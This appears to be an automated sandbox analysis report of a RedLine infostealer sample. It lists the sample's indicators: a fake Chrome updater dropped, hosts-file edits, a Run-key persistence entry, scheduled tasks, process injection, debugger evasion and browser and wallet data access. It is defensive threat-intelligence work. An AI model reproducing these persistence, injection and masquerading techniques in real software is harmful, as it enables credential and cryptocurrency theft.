Malware Analysis Report

2025-01-18 09:17

Sample ID 230808-ppkf5ace33
Target 5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d
SHA256 5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d

Threat Level: Known bad

The file 5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Reads user/profile data of web browsers

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-08 12:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-08 12:30

Reported

2023-08-08 12:32

Platform

win10-20230703-en

Max time kernel

150s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1736 set thread context of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1664 set thread context of 4464 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1664 set thread context of 4300 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1664 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1664 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1664 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1664 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1664 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 5100 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 5100 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1664 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1664 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1664 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
